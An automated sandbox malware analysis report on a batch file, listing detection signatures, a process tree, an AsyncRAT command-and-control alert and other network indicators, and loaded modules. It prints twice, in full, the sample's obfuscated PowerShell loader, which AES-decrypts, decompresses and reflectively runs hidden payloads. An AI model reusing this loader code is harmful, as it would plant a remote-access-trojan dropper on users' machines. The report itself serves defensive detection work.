Windows Analysis Report
15.bat

Overview

General Information

Sample name: 15.bat
Analysis ID: 1429038
MD5: 1bf971e48ba0ca904319be9147a96c33
SHA1: 75078fd8b6a000b848eb3f372e5f84fb58d5b98e
SHA256: 74742f3e892f02c91b2f2dd9e1547ffe42681bb755b0f28b2dd602afb46af39e
Tags: bat

Detection

Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Snort IDS alert for network traffic
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Suspicious powershell command line found
Very long command line found
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • cmd.exe (PID: 6264 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\15.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6556 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\15.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6336 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\15.bat';$MMJz='GelYestClYesurlYesrenlYestlYesProlYesceslYesslYes'.Replace('lYes', ''),'ChFGxTanFGxTgFGxTeEFGxTxFGxTteFGxTnsFGxTiFGxToFGxTnFGxT'.Replace('FGxT', ''),'EleTQWBmeTQWBnTQWBtAtTQWB'.Replace('TQWB', ''),'CrAFGseAFGsaAFGstAFGseAFGsDecAFGsryAFGsptAFGsorAFGs'.Replace('AFGs', ''),'SRlYbpRlYblRlYbiRlYbtRlYb'.Replace('RlYb', ''),'DoaAnecooaAnmpoaAnresoaAnsoaAn'.Replace('oaAn', ''),'EnHILctrHILcyHILcPoHILcinHILctHILc'.Replace('HILc', ''),'CDYnropDYnryToDYnr'.Replace('DYnr', ''),'ReaOApIdLiOApInesOApI'.Replace('OApI', ''),'IndQRQvodQRQkedQRQ'.Replace('dQRQ', ''),'TratglInstglIfotglIrmtglIFitglInatglIlBltglIotglIctglIktglI'.Replace('tglI', ''),'MbkBwaibkBwnbkBwModbkBwulbkBwebkBw'.Replace('bkBw', ''),'FroXggooXggmBaoXggseoXgg64SoXggtroXggioXggngoXgg'.Replace('oXgg', ''),'Loajyrjdjyrj'.Replace('jyrj', '');powershell -w hidden;function FBejp($JKmLP){$UerdI=[System.Security.Cryptography.Aes]::Create();$UerdI.Mode=[System.Security.Cryptography.CipherMode]::CBC;$UerdI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$UerdI.Key=[System.Convert]::($MMJz[12])('dVsAn8RIciGbSq5PEUSffnRQiEF7D6JhJ+MhQGAxpxA=');$UerdI.IV=[System.Convert]::($MMJz[12])('rrMf8DdSiOTkJYW5AhOOlg==');$ytGVg=$UerdI.($MMJz[3])();$FTQFX=$ytGVg.($MMJz[10])($JKmLP,0,$JKmLP.Length);$ytGVg.Dispose();$UerdI.Dispose();$FTQFX;}function mpyCC($JKmLP){$FjjxJ=New-Object System.IO.MemoryStream(,$JKmLP);$sySFb=New-Object System.IO.MemoryStream;$Rdfpf=New-Object System.IO.Compression.GZipStream($FjjxJ,[IO.Compression.CompressionMode]::($MMJz[5]));$Rdfpf.($MMJz[7])($sySFb);$Rdfpf.Dispose();$FjjxJ.Dispose();$sySFb.Dispose();$sySFb.ToArray();}$BklLD=[System.IO.File]::($MMJz[8])([Console]::Title);$oNBKh=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 5).Substring(2))));$HuDRY=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 6).Substring(2))));[System.Reflection.Assembly]::($MMJz[13])([byte[]]$HuDRY).($MMJz[6]).($MMJz[9])($null,$null);[System.Reflection.Assembly]::($MMJz[13])([byte[]]$oNBKh).($MMJz[6]).($MMJz[9])($null,$null); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 5868 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 6456 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\15.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6556, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5868, ProcessName: powershell.exe
Timestamp: 04/20/24-10:06:05.477978
SID: 2850454
Source Port: 4449
Destination Port: 49730
Protocol: TCP
Classtype: A Network Trojan was detected


AV Detection

Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb2]xU source: powershell.exe, 00000006.00000002.1717945607.000001BB7EB79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdbY source: powershell.exe, 00000006.00000002.1716592666.000001BB7EA32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadLine.PDB source: powershell.exe, 00000006.00000002.1717866725.000001BB7EB64000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000006.00000002.1717866725.000001BB7EB64000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.Powershell.PSReadline.pdbpdbine.pdb source: powershell.exe, 00000006.00000002.1717721868.000001BB7EB42000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000006.00000002.1716838402.000001BB7EA6D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1717479831.000001BB7EAD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1717945607.000001BB7EB79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000006.00000002.1717945607.000001BB7EB79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Core.pdb source: powershell.exe, 00000006.00000002.1717945607.000001BB7EB79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000006.00000002.1717945607.000001BB7EB79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Core.pdb source: powershell.exe, 00000006.00000002.1717945607.000001BB7EB79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb. source: powershell.exe, 00000006.00000002.1717721868.000001BB7EB42000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1717945607.000001BB7EB79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000006.00000002.1717721868.000001BB7EB42000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb: source: powershell.exe, 00000006.00000002.1717866725.000001BB7EB64000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000006.00000002.1717945607.000001BB7EB79000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1716592666.000001BB7EA32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000006.00000002.1717721868.000001BB7EB42000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1717721868.000001BB7EB42000.00000004.00000020.00020000.00000000.sdmp

Networking

Source: Traffic Snort IDS: 2850454 ETPRO TROJAN Observed Malicious SSL Cert (AsyncRAT) 193.222.96.128:4449 -> 192.168.2.4:49730
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 193.222.96.128:4449
Source: Joe Sandbox View ASN Name: SWISSCOMSwisscomSwitzerlandLtdCH
Source: unknown TCP traffic detected without corresponding DNS query: 193.222.96.128
Source: powershell.exe, 00000006.00000002.1698215372.000001BB663C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
Source: 77EC63BDA74BD0D0E0426DC8F80085060.5.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000006.00000002.1713621454.000001BB76AB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1713621454.000001BB7697E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1698349267.000001BB66CD7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.1698349267.000001BB66BD5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.1698349267.000001BB668F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.1698349267.000001BB67F1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000006.00000002.1698349267.000001BB66BD5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000006.00000002.1698349267.000001BB668F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.1698349267.000001BB66BD5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.1698349267.000001BB66BD5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.1698349267.000001BB66BD5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.1698349267.000001BB66BD5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000006.00000002.1698349267.000001BB67832000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000006.00000002.1713621454.000001BB76AB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1713621454.000001BB7697E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1698349267.000001BB6850E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1698349267.000001BB66BD5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000006.00000002.1698349267.000001BB67F1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000006.00000002.1698349267.000001BB67F1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.orgX

System Summary

Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2177
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFD9B8A6E30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFD9B8AF8D8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFD9B8AF50D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFD9B8BDCA0
Source: classification engine Classification label: mal68.evad.winBAT@11/10@0/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\MyData
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5804:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\nkvohxapain
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_owwgvgmx.sep.ps1
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\15.bat" "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\15.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\15.bat';$MMJz='GelYestClYesurlYesrenlYestlYesProlYesceslYesslYes'.Replace('lYes', ''),'ChFGxTanFGxTgFGxTeEFGxTxFGxTteFGxTnsFGxTiFGxToFGxTnFGxT'.Replace('FGxT', ''),'EleTQWBmeTQWBnTQWBtAtTQWB'.Replace('TQWB', ''),'CrAFGseAFGsaAFGstAFGseAFGsDecAFGsryAFGsptAFGsorAFGs'.Replace('AFGs', ''),'SRlYbpRlYblRlYbiRlYbtRlYb'.Replace('RlYb', ''),'DoaAnecooaAnmpoaAnresoaAnsoaAn'.Replace('oaAn', ''),'EnHILctrHILcyHILcPoHILcinHILctHILc'.Replace('HILc', ''),'CDYnropDYnryToDYnr'.Replace('DYnr', ''),'ReaOApIdLiOApInesOApI'.Replace('OApI', ''),'IndQRQvodQRQkedQRQ'.Replace('dQRQ', ''),'TratglInstglIfotglIrmtglIFitglInatglIlBltglIotglIctglIktglI'.Replace('tglI', ''),'MbkBwaibkBwnbkBwModbkBwulbkBwebkBw'.Replace('bkBw', ''),'FroXggooXggmBaoXggseoXgg64SoXggtroXggioXggngoXgg'.Replace('oXgg', ''),'Loajyrjdjyrj'.Replace('jyrj', '');powershell -w hidden;function FBejp($JKmLP){$UerdI=[System.Security.Cryptography.Aes]::Create();$UerdI.Mode=[System.Security.Cryptography.CipherMode]::CBC;$UerdI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$UerdI.Key=[System.Convert]::($MMJz[12])('dVsAn8RIciGbSq5PEUSffnRQiEF7D6JhJ+MhQGAxpxA=');$UerdI.IV=[System.Convert]::($MMJz[12])('rrMf8DdSiOTkJYW5AhOOlg==');$ytGVg=$UerdI.($MMJz[3])();$FTQFX=$ytGVg.($MMJz[10])($JKmLP,0,$JKmLP.Length);$ytGVg.Dispose();$UerdI.Dispose();$FTQFX;}function mpyCC($JKmLP){$FjjxJ=New-Object System.IO.MemoryStream(,$JKmLP);$sySFb=New-Object System.IO.MemoryStream;$Rdfpf=New-Object System.IO.Compression.GZipStream($FjjxJ,[IO.Compression.CompressionMode]::($MMJz[5]));$Rdfpf.($MMJz[7])($sySFb);$Rdfpf.Dispose();$FjjxJ.Dispose();$sySFb.Dispose();$sySFb.ToArray();}$BklLD=[System.IO.File]::($MMJz[8])([Console]::Title);$oNBKh=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 5).Substring(2))));$HuDRY=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 6).Substring(2))));[System.Reflection.Assembly]::($MMJz[13])([byte[]]$HuDRY).($MMJz[6]).($MMJz[9])($null,$null);[System.Reflection.Assembly]::($MMJz[13])([byte[]]$oNBKh).($MMJz[6]).($MMJz[9])($null,$null); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptnet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: devenum.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winmm.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: devobj.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msdmo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb2]xU source: powershell.exe, 00000006.00000002.1717945607.000001BB7EB79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdbY source: powershell.exe, 00000006.00000002.1716592666.000001BB7EA32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadLine.PDB source: powershell.exe, 00000006.00000002.1717866725.000001BB7EB64000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000006.00000002.1717866725.000001BB7EB64000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.Powershell.PSReadline.pdbpdbine.pdb source: powershell.exe, 00000006.00000002.1717721868.000001BB7EB42000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000006.00000002.1716838402.000001BB7EA6D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1717479831.000001BB7EAD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1717945607.000001BB7EB79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000006.00000002.1717945607.000001BB7EB79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Core.pdb source: powershell.exe, 00000006.00000002.1717945607.000001BB7EB79000.00000004.00000020.00020000.00000000.sdmp
